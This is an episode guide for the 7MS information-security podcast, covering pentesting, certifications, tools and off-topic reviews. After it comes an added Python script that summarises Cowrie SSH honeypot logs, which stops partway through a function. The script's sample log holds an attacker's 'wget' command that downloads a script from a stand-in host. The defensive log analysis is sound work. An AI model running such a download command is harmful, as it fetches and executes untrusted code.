Full episode guide

Below is a blurb on each podcast episode, a link to show notes where applicable, and an embedded MP3 for your listening pleasure!

1: Epic Introduction

In this episode, I talk about the inspiration behind the 7MS podcast and my vision for it going forward. (Admittedly, my ulterior motive is to use this intro episode to figure out how in the heck to get this podcast submitted and visible on iTunes :-).

View this episode's show notes for more information.

2: The Importance of Logging and Alerting

In this episode I talk about how a client of ours learned a hard lesson: that the lack of logging/alerting makes for a pretty miserable investigation after they were breached.

View this episode's show notes for more information.

3: Patch Strategies: Part 1

Here are some strategies for getting patching done the right way.

View this episode's show notes for more information.

4: Patch Strategies: Part 2

In this episode I continue talking about some dos and don'ts of patch strategies – this time talking about enterprise level gear.

View this episode's show notes for more information.

5: Fun Firewall Rules - part 1

In this episode I talk about some basic firewall rules that many organizations don’t have in place.

View this episode's show notes for more information.

6: Fun Firewall Rules - part 2

In this episode I continue talking about some basic firewall rules that many organizations don’t have in place.

View this episode's show notes for more information.

7: External Vulnerabilities that Byte

In this episode I talk about external network vulnerabilities that we see in many of our assessments – some of which are pretty easy to clear up.

View this episode's show notes for more information.

8: CISSP - Is That the Cert for Me?

All about the CISSP certification, what it covers, how to study for it, and how to pass it!

View this episode's show notes for more information.

9: Information Security for the Whole Family

A chat about sharing passwords with your spouse and how you should probably make home network production changes after hours :-).

View this episode's show notes for more information.

10: Information Security for the Whole Family - part 2

In this episode I talk more about some infosec-y things I’m doing on the home front to nurture a security culture (if you will) with my wife and kids.

View this episode's show notes for more information.

11: Overtraining your iPhone Touch ID

In this episode I totally throw my subscribers for a loop and do a VIDEO podcast about overtraining your Touch ID on your iPhone.

View this episode's show notes for more information.

12: Why My Domains Have Gan to Gandi

In this episode I talk about an account takeover article that freaked me out, and why it changed a few things about how I handle my important online accounts.

View this episode's show notes for more information.

13: How to Get Pwned by HP

In this episode I talk about how I had to send my HP laptop in for repair and, to my surprise, it (allegedly) came back with a bonus: malware!

View this episode's show notes for more information.

14: H8 4 Win 8 (audio)

In this episode I talk about two (sort of) security related tips that I’ve learned by using Windows 8 wrong.

View this episode's show notes for more information.

15: PwnPad Initial Impressions

In this episode I talk about my initial impressions of using the PwnPad for wireless pentesting.

View this episode's show notes for more information.

16: PwnPad Initial Impressions - part 2!

In this episode I talk about my first-hand experience using the PwnPad for wireless pentesting.

17: How to Pass the Certified Ethical Hacker Exam

In this episode I share my experience with EC-Council’s Certified Ethical Hacker training and exam.

View this episode's show notes for more information.

18: Wireless Security 101

In this episode I talk about some wireless security basics that we’re not seeing when out on assessments.

View this episode's show notes for more information.

19: Kioptrix! (audio)

In this episode I talk about a deliciously vulnerable series of VMs called Kioptrix, and how you can use them to sharpen your pentesting skills.

View this episode's show notes for more information.

20: Moving from GoDaddy to DNSimple (audio)

In this episode I talk about why I’m pulling my domains from GoDaddy, and making DNSimple their new home.

View this episode's show notes for more information.

21: OSCP - Part 1

In this episode I talk about my venture into Offensive Security and the OSCP certification!

22: Black Squirrel

This episode is about using Black Squirrel for phishing campaigns.

View this episode's show notes for more information.

23: OSCP - Part 2

Part 2 of the OSCP series, focusing on how you need to make sure you document everything as you go!

24: Why Wireless Scares Me

This episode is all about why you should (probably not) use wireless hotspots, and keeping yourself safe in general when surfing the Web.

25: Writing Better Pentest Reports

This episode talks about some pointers, tools and tips towards writing better pentest reports.

26: The Importance of Training and Awareness

This episode talks about one topic I’m particularly passionate about. I call it “How not to click on bad stuff.”

27: Backing Up with Crashplan

This is a NON-endorsed/sponsored episode about my personal favorite backup service called CrashPlan.

28: Infosec for Kids?

This is more of a random, wondering aloud type of episode as I think about raising my kids with infosec in mind.

29: Follow Up Then!

This isn’t necessarily related to security, but it’s about one of my favorite tools to keep my todos organized: FollowUp Then!

30: Managing Privileged Accounts

Most organizations I talk to have no idea where their privileged accounts are used across the network. I recently saw a demo of a solution called CyberArk, which seems to address that problem.

31: Network Detective

Network Detective is a tool we’ve been using as kind of an addendum to our full security assessment. It gives some nice, plain-English Excel spreadsheets and Word docs that report on AD health and structure, PC inventory and open ports, AV clients that aren’t working right, and a whole lot more.

32: OSCP - Part 3

An obvious (hopefully) tip that will save you a ton of time.

34: The Hacker Playbook

I found a great bit of reading that walks you through the “plays” of hacking – enumeration, exploitation, post-exploitation, etc. It’s a great (and affordable) book called The Hacker Playbook.

35: OSCP - Part 4

More about the challenging, rage-inducing OSCP training experience.

36: OSCP - Part 5

More OSCP discussion goodness.

37: Keimpx

Ever wanted to pass hashes a whole network at a time? Check out this episode, where I talk about one of my fav new tools called Keimpx.

38: OFFTOPIC - Health and Infosec

Every once in a while I thought it would be fun to go slightly off topic and talk about other stuff I’m interested in. This episode kind of has a tech twist though. I talk about how I use my iPhone and a few apps to stay at least a little bit in shape.

39: Infosec on the Disney Boat

I took a Disney cruise with my family recently, and one particular aspect of the trip gave me the Big Brother heebie-jeebies.

40: OSCP - Part 6

Yep, OSCP continues to kick my butt. I hope this episode helps it kick yours less.

41: OSCP – Part 7

Tired of talking about OSCP yet? Me neither!

42: Vulnerability Scans vs. Pentests

I think everybody throws around the terms “vulnerability scans” and “pentests” and they mean completely different things from one person to the next. In this episode I try to explain the difference (in my mind, anyway).

43: Why Web Site Vulnerability Scanners Can Ruin Your Day

Did you know that Web site vulnerability scanners can destroy your customer sites? If not, listen to this.

44: OFFTOPIC – Annoying People at the YMCA

Warning, this is an off topic episode! Did you know it’s fun to stay at the YMCA? Did you also know it’s fun to annoy annoying people at the YMCA? Listen to this episode to find out why.

45: OFFTOPIC – Why I Stopped Pirating Software

Warning, this is an off topic episode! I used to pirate software. There. I admitted it. But it’s funny how a letter from the Comcast legal dept. will make someone want to stop pirating software forever, immediately.

46: So You Want to Be a Hacker?

So you want to be a hacker? Cool. In this episode I toss myself under the bus and share why I used to have a really dumb perspective on what that meant, and how my view of hackers has changed dramatically.

47: Logging and Alerting RELOADED

Hey, you should log the stuff going on in your network. This episode talks about that (again). And I reference some AD-related settings that may not be enabled in your environment.

48: So I Gave My Eight Year Old a Computer

Is it a good idea to give young kids a computer to play with? Maybe. Maybe not. Tune in to today’s episode and weigh in!

49: OSCP – The Final Chapter – part 1!

We’ve arrived at the exciting two-part finale to my bloody battle with the OSCP!

50: OSCP – The Final Chapter – part 2!

At last, the epic conclusion of the maddening, redeeming OSCP journey.

51: CEH vs. OSCP

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you.

52: OFFTOPIC – My Son is Really Loyal

It’s another off-topic episode today. This one’s about how my eight-year-old son is fiercely loyal, and wants to settle a 25-year-old score for me.

53: Are You Ready to Get Robbed?

Business DR plans are a hugely important – and often overlooked – piece of the infosec puzzle. But what about at home? If you got run over by a bus tomorrow, would you have good backups and DR in place?

54: Traveling with a Red Giant

If you’re concerned about your credit/debit card security, you might want to give Red Giant a try. It’s a service that provides a debit card you can unlock only when actively buying things, and lock whenever you're not.

55: OFFTOPIC – What’s in Brian’s Murse?

Ok I don’t really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I’ve been nerding out on the last few weeks.

56: OFFTOPIC – Catching Up and Blowing Noses

A few offtopic things:

  • What you can expect as far as a podcast release schedule going forward
  • Two suspicious charges that showed up on my credit card while out of town!

57: How to Review a Firewall

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a good automated tool.

58: What Should We Do First?

At the end of just about every assessment I deliver, the client asks “What should we do first?” They (understandably) want to know a “top 5″ list of things they should change right away to improve their security posture.

59: Traveling with a Red Giant – Part 2

A few episodes back I talked about Red Giant, a cool service that provides you with a pre-paid debit card that can be controlled/locked with your phone. I finally got my card working, and this episode is about some cool things I learned about it.

60: How Not to Suck at Customer Service

This episode was inspired by two awesome customer service experiences I had in the past week. It got me thinking: how can we as infosec professionals suck less with our customer service approach?

61: Why Local Admin Rights Suck

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights.

62: You Should Run LAPS

Microsoft has released a tool called Local Administrator Password Solution to help administrators manage local admin credentials for domain-joined machines. Check out this article for more information, and please contact me if you end up running this, as I’d love to hear about your experience.

63: I’m Excited to Go Phishing

This week I’ll be launching a phishing campaign against an organization that has been well trained to defend against such malicious attacks and links! Will this organization break my company’s 100% success rate for phishing, or will I be able to craft an email to fool at least one person?

64: Wifi Sniffing is Fun - Part 1

I got a fun project involving wireless sniffing, followed up by scraping through packets looking for credit card data! Here’s part 1, which talks about software/hardware you might need to do this the right way.

65: OFFTOPIC - Still Alice

Warning, this episode is off topic and has NOTHING to do with infosec! Nope! Instead, it’s a review of the movie Still Alice.

66: I’m Excited to Go Phishing – Part 2

This is a follow-up to episode #63, discussing the results of a fun phishing campaign I recently completed.

67: Wifi Sniffing is Fun - Part 2

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network “map” of my sniffing setup.

68: Is Training and Awareness Worth It or Worthless?

This episode is about something that got my undies in a bunch – I heard a security expert imply that training and awareness might be worthless!

69: I’m Not Responsible for Your Information Insecurity

Are you too hard on yourself? Do you think the success of your client’s infosec program lives and dies with you? Listen to this episode. You might feel better.

70: Get the Most out of Your DNS!

I’m pumped to talk about an awesome, free little tool that made my Internet connection feel like new again.

71: OFFTOPIC - Mad Max

We’re going totally off topic today and doing a movie review of Mad Max!

72: PCI Pentesting 101


73: PCI Pentesting 101 – Part 2

This episode is the exciting continuation of a recent pentest I did, in which I got some serious pwnage, including cracking the domain admin password!

74: How to Become a More Organized Information Security Professional

In this episode I share some strategies and apps that may help you stay more organized as you go about your infosec work!

75: OFFTOPIC - My Son's Piano Recital

I wanted to share (what I think is) an amusing anecdote about my son's first piano recital, which was topped off by a kid playing the song "Lucky." Many LOLs commenced for me.

76: Lessons Learned from LastPass

I know this is a bit late, but I wanted to talk a little about the LastPass breach and why I'll still remain a customer.

77: OFFTOPIC - Rickrolling Your Coworkers for Fun and Profit

This week I used my Wifi Pineapple to scare and amuse my coworkers and lure them into a Rickroll trap. All the gory details in today's episode!

78: It's All About Segmentation

In this episode I advocate for proper network segmentation, as doing it (well and right!) can seriously reduce your risks!

79: My Love/Hate Relationship with Nessus

In this episode I talk about one of my favorite vulnerability scanners, Nessus, and why I want to simultaneously hug it and punch it in the neck.

79.5: UPDATE(!) on My Love-Hate Relationship with Nessus

In episode #79 I shared some gripes about Nessus. Those gripes were quickly answered by Tenable staff/support so I wanted to pass relevant updates on to you!

80: OSWP - Part 1

This episode kicks off a multi-part series all about the OSWP (Offensive Security Wireless Professional) certification.

81: OSWP - Part 2

A continuation of our thrilling, exciting, mind-blowing series on OSWP (Offensive Security Wireless Professional)!

82: OSWP - Part 3

The OSWP series is coming to a close. One final episode today and then the four-quel episode will be all about the test!

83: Wifi Pineapple First Impressions

In this episode I talk about my first hands-on experience with a Wifi Pineapple, and why you'll probably want one too.

84: DIY Pwn Pad

Hey have you heard of Pwn Pads? They're an awesome network pentesting tool that leverages a Nexus tablet - which you can either buy right from Pwnie Express, or create your own if you have a certain model of Nexus lying around. I just happened to have the right Nexus model around, so this podcast episode chronicles my trial and error (mostly error) in making a DIY Pwn Pad!

P.S. to get the Android tools installed on Ubuntu 14.04, run these commands:

sudo add-apt-repository ppa:nilarimogard/webupd8
sudo apt-get update
sudo apt-get install

85: What is The Penetration Testers Framework (PTF)?

Need an easy way to create a modular/mobile kit of pentest tools to take with you from machine to machine? And ALSO be able to update all those modules in one command? Then check out the PTF! That's what we're talkin' about on today's podcast.

86: OSWP-The Final Chapter!

This episode concludes the gripping, thrilling, exciting, awesome-ing, death-defying, unsettling, rattling series on OSWP (Offensive Security Wireless Professional). Specifically, I talk (as much as I can without getting into trouble) about the exam and give you some pointers to pass it!

87: Presenting the Right Findings to the Right Audience

Today I talk about a challenge I run into when I'm delivering to a mixed audience of C-level folks and IT people. How do you keep things high level enough so everybody "gets it" but also go low level enough that the recommendations have some teeth?

88: Glasswire

This episode's about a cool security app called GlassWire, which is (kind of) a firewall on steroids. I love it! Oh, and this is not an endorsement or a commercial :-)

89: AppSpider

Today we're talking about a new (to me) Web site/app scanning tool called AppSpider by Rapid7. Again, this isn't a commercial or paid advertisement. I just like sharing things that I like and use.

90: OFFTOPIC - Citizenfour

We're going offtopic today and talking about the Citizen Four documentary, which centers around the Edward Snowden story.

91: Umbrella

Today's episode is about Umbrella, a product from OpenDNS that provides a layer of protection against malware, wifi-jacking and other threats.

92: You're Not Ready for Big Boy Security Pants

Sometimes I get in situations where clients want their WHOLE security program reviewed, but in reality, they are still in the baby steps phase. What's the right thing to do when, for lack of a better term, the client isn't ready to put on their security big boy pants?

93: Securing Your Life

So yeah, this is kind of off-topic, but have you thought about security in the sense of "What kinds of security things should I be doing before I'm dead?" Today's episode explores that.

94: Learn How to Burp - Part 1

I've been looking for better ways to learn Burp Suite and I struck gold! Check out my recommendations in today's episode!

95: How to Make Friends During a Security Assessment

When you start a security assessment with a company, not everybody's gonna be glad to see you. The IT dept and other employees may have tense shoulders, thinking that this is an Office Space situation where they're interviewing for their jobs. This episode talks about some ways you might be able to get your assessment off to a right start.

96: How to Make Enemies During a Security Assessment

Yep, we're talking about how to make ENEMIES during a security assessment today (and maybe turn them into friends).

97: OFFTOPIC - Limbo

We're going off topic today and talking about video games! LIMBO for the Xbox!

98: Intro to PCI Scoping

So far I've focused on the technical aspects of PCI, but I'm trying to get familiar with the overall scoping questions that my tenacious QSA friends ask when they start a gap analysis. This episode shares some interesting tidbits I learned while doing some QSA "shadowing" on an assessment of a restaurant.

99: How to Deliver Bad News in a Good Way

Today's episode gives you some tips on how to deliver bad news in an assessment in a positive way. I think that last sentence was a grammatical nightmare.

100: Assessment Curses Can Be Blessings

Ever had an assessment that you thought would be the death of you? I had one recently, but after sticking it out, it turned out to be a blessing in disguise.

101: OFFTOPIC - I Am Chris Farley

The new(ish) Chris Farley documentary is fantastic - see it!

102: Recon-ng!

I'm a big fan of Recon-ng and you should be too! Check it out - and learn more about Tim Tomes, its creator - at www.lanmaster53.com. And here's the video I mentioned in the podcast - my first look at Recon-ng in action:

103: OFFTOPIC - I Was in a Movie Once

This is an off-topic episode about the time I was in the holiday comedy super-smash laugh-fest, Jingle All the Way.

104: LANTurtle First Impressions

Hey I just got a LANTurtle and....these are my first impressions!

105: OFFTOPIC - Big Bag of Random Sauce

Today's totally random episode covers:

  1. How bad does this podcast's logo suck?
  2. Does this podcast need a theme song?
  3. Some interesting training I'm taking next week.
  4. The Walking Dead - who should die?
  5. Metal Gear Solid and my personal godmode strategy.

106: A Day in the Life of an Information Security Analyst

A listener wrote in asking some questions about "a day in the life of" a security analyst, so here's my best stab at it!

107: I'm Going to PWAPT!

Hey I'm going to PWAPT this week (http://www.eventbrite.com/e/practical-web-application-penetration-testing-with-tim-tomes-lanmaster53-tickets-16718889649), so in this episode I talk about that...and how I'll probably be too info-overloaded to record anything on Thursday :-). Oh, and I had a fun Web app pentest this week that I wanted to share some fun bits on.

108: I'm Going to PWAPT! - Part 2

Here's part 2 (of probably several to come) about my experience with PWAPT (Practical Webapp Pentesting) training last week!

109: OFFTOPIC - It Follows and Backcountry

Movie reviews of It Follows and Backcountry.

110: Hacking WPA Enterprise - Part 1

This episode is about my experience hacking WPA enterprise. Huge mega tiger uppercut thanks to this site for giving me the fixes I needed to get this working on Kali2!

111: Hacking WPA Enterprise - Part 2

The thrilling (?) conclusion of my experience hacking WPA Enterprise.

112: This is Sparta!

This episode is about one of my favorite enumeration tools called Sparta - it's built right into Kali 2. And maybe it was in Kali 1 and I totally missed it. But whatevs. I'm happy to have found it now!

113: Big Bag of Random Security Stuff

Yep, this episode is EXACTLY what the title implies.

114: PCI Pentesting 101 - Part 3

Part 3 on my series about PCI pentesting. Yeah. That.

115: OFFTOPIC - Love and Mercy

We're going off-topic today and talking about the new(ish) movie about Brian Wilson's life called Love and Mercy.

116: Tips for a Successful Vulnerability Scan

In this episode I complain about getting stuck in NY for two days, and also how to efficiently scan for vulnerabilities when your time is crunched.

117: OFFTOPIC - Alive Inside

Today I talk about one of the most moving films I've ever seen - a documentary called Alive Inside.

118: Should Phishing be Fair?

This episode discusses an important and rhetorical (to me) infosec question: Should phishing campaigns be "fair?"

119: Migrating from Tumblr to Ghost - Part 1

In this episode I talk about my adventures in moving my brianjohnson.tv Tumblr content over to a Digital Ocean hosted droplet running Ghost. I think you'll want to check this episode out, because in part 2 I talk about the challenges I faced in hosting multiple Ghost instances on one DO droplet. I will also be talking about how to enable CloudFlare SSL (for free!) as well as enabling Fail2Ban to keep annoying people/IPs from brute forcing your SSH root account!

View this episode's show notes for more information.

120: The Purge!

Announcing the 7MS PURGE! I've got a back log of episodes banked and I want to get caught up for the new year. So I'm going to release one (or maybe more) episodes per day between now and 2016. Plus (spoiler alerts!) in 2016 we're moving to a Monday/Wednesday/Friday release schedule. Yep, 7MS three times a week - thanks for the idea, mom!

View this episode's show notes for more information.

121: Migrating from Tumblr to Ghost - Part 2

Part 2 concludes my journey in moving 7ms.us from Tumblr to a Digital Ocean droplet running Ghost. Here are the key resources mentioned during the podcast:

  • How to run multiple Ghost blogs on one DO VPS. The key takeaway here was that I had to upgrade to the $10 droplet (I did a "flexible" resize to add more proc/memory) and then the second instance of Ghost installed fine.
  • Turning on CloudFlare SSL was easy. I chose flexible SSL since I wasn't using a "real" cert. I also wrote a rule to force HTTPS for all connections.

View this episode's show notes for more information.

122: OFFTOPIC-An Apology to Elephants

This episode is about a documentary called An Apology to Elephants. It's all about the treatment (or mistreatment) of elephants, and the main message of the movie is, "Please don't go to the circus when it's in town, because you're supporting elephant abuse." Even if that message was a little heavy handed, I certainly will pass on tickets next time a circus act comes through town.

View this episode's show notes for more information.

123: Doing a "Redo" Assessment

This episode talks about my experience in doing a "redo" security assessment, during which I struggled with the following questions: what's the best way to efficiently correct the erroneous information and make the customer happy without asking ALL the original questions over again? Especially when I have little to no time to prepare for the "redo" interview?

View this episode's show notes for more information.

124: Sprinkles

This episode is 90% a rant about how annoying carry-on luggage and air travel can be, and a 10% sprinkling of security sauce mixed in. Hence: sprinkles.

View this episode's show notes for more information.

125: Securing Your Life - Part 2

Way back in episode #93, I talked about things you can do to secure your life (mortgage review, adequate insurance, estate planning, investments, etc.). This episode continues that train of thought and covers: getting the right amount of life insurance, getting the right home/auto coverage, as well as estate planning.

View this episode's show notes for more information.

126: Get Your Name Out There

This episode isn't about infosec exactly, but it talks about how using public resources like LinkedIn, Twitter and blogs can boost your "brand" (though I hate that word) and help you get more connected to the infosec community, job leads and more!

View this episode's show notes for more information.

127: Intro to HIPAA Assessments

This episode covers a few HIPAA tidbits I picked up while preparing for - and executing - a HIPAA security assessment.

View this episode's show notes for more information.

128: Transparency is King

In this episode, I talk about a restaurant infosec assessment I did, and how the recommendations coming out of that assessment didn't fit the standard "mold." I also talk about how being transparent and helpful - and NOT billing clients for every tiny little thing - is king.

View this episode's show notes for more information.

129: Embarrassing Stories

In this episode I talk about face-planting in my office at the first job I had out of college.

View this episode's show notes for more information.

130: Sqlmap and Sqlninja FTW

This episode talks about some fun I had using sqlmap, and how using it in conjunction with Sqlninja makes me happy to be alive.

View this episode's show notes for more information.

131: How to Attempt a Two Week Pentest in Two Days

The title says it all. I had two days to pentest a network that probably would've taken two or more people two weeks or more. I laughed. I cried. I had fun.

View this episode's show notes for more information.

132: I Got a New Job - Part 1

This is a four-part series about my transition to a new job! The topics are as follows:

  • Part 1: When it may be time to look for a new job (or not)
  • Part 2: How to stand out during phone screenings and interviews
  • Part 3: How to gracefully transition from old job to new job
  • Part 4: Here's what I'm doing in my new gig!

View this episode's show notes for more information.

133: I Got a New Job - Part 2

This is a four-part series about my transition to a new job!

View this episode's show notes for more information.

134: I Got a New Job - Part 3

This is a four-part series about my transition to a new job!

View this episode's show notes for more information.

135: I Got a New Job - Part 4

This is a four-part series about my transition to a new job!

View this episode's show notes for more information.

136: Python for Newbs

One skill that's been kind of a hindrance in my IT/security career is I have exactly zero experience in programming/coding. Zero. Zip. Nil. Nada. Nothing. But I'm trying to remedy that in 2016 by learnin' me some Python, and I picked up a great book called Python Crash Course, which has been exactly what this newb needed. At the time of publishing, you can get 30% off with the coupon code CRASHCOURSE!

View this episode's show notes for more information.

137: OFFTOPIC - Welcome to Leith

This off-topic episode talks about one of the most gripping and disturbing documentaries I've ever seen. Welcome to Leith, in a nutshell, asks the question: What would you do if a white supremacist group moved in next door?

View this episode's show notes for more information.

138: OFFTOPIC - The Hateful Eight

Looks like I'm one of the few people in the world who did NOT love this movie. I found it painfully slow and claustrophobic. #disappointed.

View this episode's show notes for more information.

139: Securing Your Life - Part 2

Back in episode #93 I talked about securing your life - in other words, asking yourself "What would happen if I was dead right now? Do I have adequate insurance? Are my finances in order? How about estate planning?" This episode continues that train of thought, and I share some new changes I've made in my "life security" department.

View this episode's show notes for more information.

140: OFFTOPIC - Video Games I'm Currently Playing

This episode talks about some cool video games I've been playing lately:

  • Metal Gear Solid Phantom Pain (Xbox 360)
  • Rise of the Tomb Raider (Xbox 360)
  • Luminocity (iPhone)
  • Super Mario Maker (Wii U)

I recommend 'em all!

View this episode's show notes for more information.

141: Happy (Belated) New Year!

Happy (belated) new year! This episode is more of a "What am I listening to, a PBS telethon?!" kind of thing, and I'm sorry for that. But I want to cover:

  • Scheduling changes for 2016 - we're gonna be 3 times a week!
  • A new documentation project I'm working on called BPATTY (Brian's Pentesting and Technical Tips for You)
  • A way you can support the podcast financially.

View this episode's show notes for more information.

142: OFF-TOPIC - Media Servers and Making a Murderer

This off-topic episode covers:

  • Media servers - I'm a newb in this area and could use your help in setting up a config that actually works!
  • Making a Murderer - this is a fantastic show!

View this episode's show notes for more information.

143: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

144: Shoulder-Surfing with Seasoned Pentesters

I recently had the opportunity to shoulder-surf with some seasoned Webapp pentesters, and wanted to share what I learned about their tools, techniques and methodologies.

View this episode's show notes for more information.

145: OFF-TOPIC - Sicario and The Walk

In today's off-topic episode I review two movies: Sicario and The Walk.

View this episode's show notes for more information.

146: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

147: DIY Hosted Mutillidae

In this episode I talk about how to build a cheap hosted Mutillidae server to safely hack away on while keeping other Internet prowlers out.

View this episode's show notes for more information.

148: OFF-TOPIC - Apple Watch Review

Yep, there are tons of people/blogs/magazines/children/pets who have provided reviews of the Apple Watch. This is mine.

View this episode's show notes for more information.

149: Securing Your Life - Part 3

This episode continues the series on securing your life - making sure all the security stuff related to your life is in order. Today we're particularly focusing on preparing to travel. What if (God forbid) the plane goes down? Who has access to your money, passwords, etc.?

View this episode's show notes for more information.

150: OFFTOPIC-Bone Tomahawk / Goodnight Mommy / Comedy Loves Misery

View this episode's show notes for more information.

151: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

152: Review of the Almond 2015 Wireless Router

This is a mini-review of the Almond 2015 router by Securifi. This is NOT a paid advertisement or endorsement.

View this episode's show notes for more information.

153: Ex Machina (and special musical guest)

Today's episode is a movie review of Ex Machina (how the FRICK do you pronounce that?) and closes out with special musical guest, Sweet Surrender!

View this episode's show notes for more information.

154: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

Things discussed today:

  • We could make 1 million dollars if we made a tool that could correlate data from all the popular pentesting tools.
  • The differences in vuln descriptions between AppSpider and Nexpose really grind my gears!
  • My parents' dog wears a 50 dollar LL Bean jacket - wha?

View this episode's show notes for more information.

156: OFF-TOPIC - 3 Ways to be a More Connected Parent

I never thought working from home would make it harder to transition to "home time" when the clock strikes 5 p.m. Today's episode discusses 3 ways I'm trying to be a more connected parent.

View this episode's show notes for more information.

157: Infosec News and Links Roundup

View this episode's show notes for more information.

158: Pentesting in a Vacuum

How do you keep 20 Kali boxes setup with Metasploit Pro and updated without any access to the Internet? Carefully, I guess :-). In today's episode I talk about some of those challenges, as well as progress made thus far.

View this episode's show notes for more information.

159: OFF-TOPIC - What Size Company is Right for Me? (and a review of the Steve Jobs movie)

People have been writing in asking if they should work in a huge company or a small consulting/IT shop. I think they both have their pros and cons, but in this episode I attempt to oversimplify the decision with this question: How many hats do you want to wear?

View this episode's show notes for more information.

160: Infosec News and Links Roundup

View this episode's show notes for more information.

161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp

Back in episode 157 I talked about a great article that walks you through using Kali to create a map of the wifi networks around you. I had a need to go through this exercise over the weekend, so here's my condensed walkthrough.

View this episode's show notes for more information.

162: OFF-TOPIC - Deadpool

This episode is a mini review of DEADPOOL! I had a huge reservation about Deadpool before seeing it, but the film squashed it...and has restored my faith in the superhero franchises! I give it an A!

View this episode's show notes for more information.

163: Infosec News and Links Roundup

View this episode's show notes for more information.

164: Pentesting in a Vacuum - Part 2

This is a continuation of episode #158, in which I described my challenges in creating a 20-server Kali environment with no Internet access.

View this episode's show notes for more information.

165: DIY Podcast

Well, my first choice for topic today (DIY retro gaming console) fell through (ARGH!) so today I chat about another topic people ask about: what tools/services go into making a podcast. Here's my setup in a nutshell.

View this episode's show notes for more information.

166: Infosec News and Links Roundup

View this episode's show notes for more information.

167: My Misadventures with SOAP Web Services

TLDR: Before I'd do another SOAP Web services test, I'd ask (demand) the following from the dev team:

  • WSDLs for all services in scope
  • SoapUI project file populated with a valid request for each Web service (so I can distinguish responses and app behavior).

View this episode's show notes for more information.

168: Upgrading and Securing Your Digital Ocean Ghost Blog

This weekend, while I was comforting my barfing son, I did some securing and tune-up work on this blog, which is an Ubuntu Digital Ocean droplet running on the Ghost blogging platform. Here's the spit and polish that was applied.

View this episode's show notes for more information.

169: Infosec News and Links Roundup

View this episode's show notes for more information.

170: Pentesting in a Vacuum - Part 3

This weekend I was tasked with pentesting a subset of a few specific hosts, and also running some scenarios such as "An attacker has a presence on one of the machines, what can he do to further grab creds/info and use that to escalate permissions/privs in the environment?"

View this episode's show notes for more information.

171: OFF-TOPIC - Easter Music

This is probably the most off-topic of all off-topic episodes - in that the topic isn't really a topic at all. Instead, I offer up two of my favorite worship songs to get us in an Easter mindset for the weekend. Have a listen.

View this episode's show notes for more information.

172: Infosec News and Links Roundup

View this episode's show notes for more information.

173: DIY SSH Honeypot with Kippo

Interested in having some fun with Kippo (an SSH honeypot) on your Digital Ocean server? Here's a super fast getting started guide.

View this episode's show notes for more information.

174: DIY SSH Honeypot with Kippo - Part 2

In this episode I took my Kippo installation to the next step by incorporating mysql.

View this episode's show notes for more information.

175: Infosec News and Links Roundup

View this episode's show notes for more information.

176: DIY SSH Honeypot with Cowrie

Recently I covered the Kippo SSH honeypot and a few folks brought to my attention that this project was a little long in the tooth, and had been superseded by Cowrie. So this episode focuses on Cowrie!
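Once Kippo or Cowrie is up (episodes 173 through 176), the useful part is reading what it caught. The following is an added example, not code from the episodes or from the Cowrie project: it parses Cowrie's one-JSON-object-per-line log and summarises attempts per source address, the most-tried credentials, successful logins and the commands typed in each session. The log lines below are constructed for the example; the assumption is only the field names (`eventid`, `src_ip`, `session`, `username`, `password`, `input`), which are the ones Cowrie writes to its JSON output.

```python
"""Summarise a Cowrie SSH honeypot JSON log.

Added example: not code from the podcast or the Cowrie project.  The
sample log below is constructed; field names follow Cowrie's JSON output.
"""
import json
from collections import Counter, defaultdict

# Constructed sample log: one JSON object per line, as Cowrie writes it.
# Line 9 is deliberately truncated to show how a real log can be garbled.
SAMPLE_LOG = """
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "a1b2", "timestamp": "2016-04-01T02:14:03.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "session": "a1b2", "username": "root", "password": "123456", "timestamp": "2016-04-01T02:14:05.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "session": "a1b2", "username": "root", "password": "password", "timestamp": "2016-04-01T02:14:07.000000Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.7", "session": "a1b2", "username": "root", "password": "toor", "timestamp": "2016-04-01T02:14:09.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1b2", "input": "uname -a", "timestamp": "2016-04-01T02:14:11.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1b2", "input": "wget http://198.51.100.5/x.sh", "timestamp": "2016-04-01T02:14:20.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.23", "session": "c3d4", "timestamp": "2016-04-01T03:01:00.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.23", "session": "c3d4", "username": "admin", "password": "admin", "timestamp": "2016-04-01T03:01:02.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.23", "session": "c3d4"
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.23", "session": "c3d4", "username": "root", "password": "123456", "timestamp": "2016-04-01T03:01:06.000000Z"}
"""

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_log(text):
    """Return the list of parsed events, skipping blank or broken lines.

    A honeypot log is attacker-influenced input; a truncated line must not
    abort the whole report, so malformed JSON is dropped and counted.
    """
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # broken line: skip rather than crash the analysis
    return events


def summarise(events):
    """Aggregate login attempts, credentials, successes and commands."""
    attempts_per_ip = Counter()
    credentials = Counter()
    successful_logins = []
    commands_by_session = defaultdict(list)

    for event in events:
        eid = event.get("eventid", "")
        if eid in LOGIN_EVENTS:
            attempts_per_ip[event.get("src_ip", "?")] += 1
            credentials[(event.get("username"), event.get("password"))] += 1
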